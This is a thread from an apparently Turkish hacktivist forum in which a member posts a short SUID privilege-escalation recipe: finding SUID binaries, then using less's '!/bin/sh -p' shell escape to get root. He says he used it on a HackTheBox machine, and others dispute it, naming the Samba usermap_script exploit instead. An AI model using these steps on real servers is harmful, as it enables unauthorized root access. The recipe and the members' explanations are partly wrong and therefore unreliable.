Neler yeni

How To Abuse SUID To Get Root

HaCkEr_33

Bronz Üye
Katılım
21 Aralık 2020
Mesajlar
71
Tepkime puanı
43
İlgi Alanlarınız
Web Hacking
Cinsiyet
  1. Erkek
  1. ls -la $(which passwd)
  2. ls -la /etc/shadow
  3. find / -perm -4000 2>/dev/null

  4. touch subscribe

  5. less subscribe

  6. boş çıkacak yere !/bin/sh -p yazıyoruz ve artık sunucuda rootuz
 

Tosun

tosunc.uk
Moderatör
Katılım
19 Aralık 2020
Mesajlar
1,138
Tepkime puanı
1,679
İlgi Alanlarınız
o
Cinsiyet
  1. Erkek
eline sağlık kardeşim
 

RootAyyıldız

Hacktivist
Katılım
19 Aralık 2020
Mesajlar
265
Tepkime puanı
666
Konum
Ankara
İlgi Alanlarınız
Web Defacer & Cyber intelligence
Cinsiyet
  1. Erkek
merhaba sevgili dostum Hacker_33 nasılsın iyimisin hayırlı forumlar dilemek isterim öncelikle komutları teker teker açıklayalım
  • ls -la $(which passwd) (bulundugun dizindeki hereyi görürsün gördügün hereyin yazma okuma gibi izinlerinide görürüsn)​
  • ls -la /etc/shadow (diyerek /etc/shadow shadow dosyasının izinlerini görürüsün)​
  • find / -perm -4000 2>/dev/null (find komutu bulma komutudur burada sen aygıt dizindeki stream dosyasında belirtigin permisonda arama yapıyorsun )​
  • touch subscribe (touch ile dosya oluşturulur)​
  • less subscribe (less ile okuma işlemi yaparsın )​
  • Burada Yaptıgın İşlemler ile bir sunucuda root yetkisi alamaman lazım zira bir kullanıcının yetkisini yükseltecek her hangi bir kelime görmedim​
 

Tosun

tosunc.uk
Moderatör
Katılım
19 Aralık 2020
Mesajlar
1,138
Tepkime puanı
1,679
İlgi Alanlarınız
o
Cinsiyet
  1. Erkek
merhaba sevgili dostum Hacker_33 nasılsın iyimisin hayırlı forumlar dilemek isterim öncelikle komutları teker teker açıklayalım
  • ls -la $(which passwd) (bulundugun dizindeki hereyi görürsün gördügün hereyin yazma okuma gibi izinlerinide görürüsn)​
  • ls -la /etc/shadow (diyerek /etc/shadow shadow dosyasının izinlerini görürüsün)​
  • find / -perm -4000 2>/dev/null (find komutu bulma komutudur burada sen aygıt dizindeki stream dosyasında belirtigin permisonda arama yapıyorsun )​
  • touch subscribe (touch ile dosya oluşturulur)​
  • less subscribe (less ile okuma işlemi yaparsın )​
  • Burada Yaptıgın İşlemler ile bir sunucuda root yetkisi alamaman lazım zira bir kullanıcının yetkisini yükseltecek her hangi bir kelime görmedim​
  1. ls -la $(which passwd)
  2. ls -la /etc/shadow
  3. find / -perm -4000 2>/dev/null

  4. touch subscribe

  5. less subscribe

  6. boş çıkacak yere !/bin/sh -p yazıyoruz ve artık sunucuda rootuz
ikinizinde ellerine sağlık
 

HaCkEr_33

Bronz Üye
Katılım
21 Aralık 2020
Mesajlar
71
Tepkime puanı
43
İlgi Alanlarınız
Web Hacking
Cinsiyet
  1. Erkek
merhaba sevgili dostum Hacker_33 nasılsın iyimisin hayırlı forumlar dilemek isterim öncelikle komutları teker teker açıklayalım
  • ls -la $(which passwd) (bulundugun dizindeki hereyi görürsün gördügün hereyin yazma okuma gibi izinlerinide görürüsn)​
  • ls -la /etc/shadow (diyerek /etc/shadow shadow dosyasının izinlerini görürüsün)​
  • find / -perm -4000 2>/dev/null (find komutu bulma komutudur burada sen aygıt dizindeki stream dosyasında belirtigin permisonda arama yapıyorsun )​
  • touch subscribe (touch ile dosya oluşturulur)​
  • less subscribe (less ile okuma işlemi yaparsın )​
  • Burada Yaptıgın İşlemler ile bir sunucuda root yetkisi alamaman lazım zira bir kullanıcının yetkisini yükseltecek her hangi bir kelime görmedim​
Anladim root Ayyildiz kanka ama ben bu metodu ctf cozerken bir makinaya sizarken araştırdigimda yapmiştim sunucuda root olmuştum oyüzden not aldıgım için paylaşayım dedim
 

RootAyyıldız

Hacktivist
Katılım
19 Aralık 2020
Mesajlar
265
Tepkime puanı
666
Konum
Ankara
İlgi Alanlarınız
Web Defacer & Cyber intelligence
Cinsiyet
  1. Erkek
Anladim root Ayyildiz kanka ama ben bu metodu ctf cozerken bir makinaya sizarken araştırdigimda yapmiştim sunucuda root olmuştum oyüzden not aldıgım için paylaşayım dedim
çözdügün ctf ismini atarmısın incelemek isterim
 

HaCkEr_33

Bronz Üye
Katılım
21 Aralık 2020
Mesajlar
71
Tepkime puanı
43
İlgi Alanlarınız
Web Hacking
Cinsiyet
  1. Erkek
merhaba sevgili dostum Hacker_33 nasılsın iyimisin hayırlı forumlar dilemek isterim öncelikle komutları teker teker açıklayalım
  • ls -la $(which passwd) (bulundugun dizindeki hereyi görürsün gördügün hereyin yazma okuma gibi izinlerinide görürüsn)​
  • ls -la /etc/shadow (diyerek /etc/shadow shadow dosyasının izinlerini görürüsün)​
  • find / -perm -4000 2>/dev/null (find komutu bulma komutudur burada sen aygıt dizindeki stream dosyasında belirtigin permisonda arama yapıyorsun )​
  • touch subscribe (touch ile dosya oluşturulur)​
  • less subscribe (less ile okuma işlemi yaparsın )​
  • Burada Yaptıgın İşlemler ile bir sunucuda root yetkisi alamaman lazım zira bir kullanıcının yetkisini yükseltecek her hangi bir kelime görmedim​
Bunlari komutlarin anlamini izledigim videoda adam anlatiyodu ordan biliyorum , ama tam olarak mantigini anlamamıştım doğruyu söylemek gerekirse . HackTheBoxda Lame makinasini cozdugumde bu komutlari kullandim.
 

RootAyyıldız

Hacktivist
Katılım
19 Aralık 2020
Mesajlar
265
Tepkime puanı
666
Konum
Ankara
İlgi Alanlarınız
Web Defacer & Cyber intelligence
Cinsiyet
  1. Erkek
Bunlari komutlarin anlamini izledigim videoda adam anlatiyodu ordan biliyorum , ama tam olarak mantigini anlamamıştım doğruyu söylemek gerekirse . HackTheBoxda Lame makinasini cozdugumde bu komutlari kullandim.
merhaba sevgili dostum makineyi az önce inceleme firsatı buldum makinen rootlanma yetki yükseltme gibi bi durumu yok sadece samba servisinde bulunan bir zafiyet ile makineye giriyorsun multi/samba/usermap_script exploitini kullanarak zaten makineye girdiginde id verdiginde root olarak giriyorsun her hangi bir yetki yükseltme durumu göremedim galiba yalnış bir makine ismi söyledin
 

HaCkEr_33

Bronz Üye
Katılım
21 Aralık 2020
Mesajlar
71
Tepkime puanı
43
İlgi Alanlarınız
Web Hacking
Cinsiyet
  1. Erkek
merhaba sevgili dostum makineyi az önce inceleme firsatı buldum makinen rootlanma yetki yükseltme gibi bi durumu yok sadece samba servisinde bulunan bir zafiyet ile makineye giriyorsun multi/samba/usermap_script exploitini kullanarak zaten makineye girdiginde id verdiginde root olarak giriyorsun her hangi bir yetki yükseltme durumu göremedim galiba yalnış bir makine ismi söyledin
id degerini verdigimde yada whoami komutunu verdigimde beni root kullanicisinda karşılamadı bende internette biraz araştırdım root metodunu birkaçını denedim olmadı , en sonda bu videoyu bulup yaptım root yetkisine yükseldim makina değişmişde ola bilir içeriği birazdan yeniden bakarım ben ona
 

RootAyyıldız

Hacktivist
Katılım
19 Aralık 2020
Mesajlar
265
Tepkime puanı
666
Konum
Ankara
İlgi Alanlarınız
Web Defacer & Cyber intelligence
Cinsiyet
  1. Erkek
id degerini verdigimde yada whoami komutunu verdigimde beni root kullanicisinda karşılamadı bende internette biraz araştırdım root metodunu birkaçını denedim olmadı , en sonda bu videoyu bulup yaptım root yetkisine yükseldim makina değişmişde ola bilir içeriği birazdan yeniden bakarım ben ona
izlediğin video yu atabilirmisin
 

RootAyyıldız

Hacktivist
Katılım
19 Aralık 2020
Mesajlar
265
Tepkime puanı
666
Konum
Ankara
İlgi Alanlarınız
Web Defacer & Cyber intelligence
Cinsiyet
  1. Erkek

Konuyu görüntüleyen kullanıcılar:

Hukuksal Sorunlar İçin [email protected]
For Legal Problems [email protected]
Hacktivizm.Org
Hacktivizm.Org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Hacktivizm.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Hacktivizm saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Hacktivizm üyelerinin yaptığı bireysel hack faaliyetlerinden Hacktivizm sorumlu değildir. Sitelerinize Hacktivizm ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz. Sitemizde yer alan içerikler hakkındaki şikayetlerinizi Buradan iletişime geçerek bildirebilirsiniz. Please Report Abuse, DMCA, Scamming, Harassment, Crack or any Illegal Activities to [email protected]
Hacktivizm Twitter Hacktivizm Youtube Hacktivizm İnstagram Hacktivizm Telegram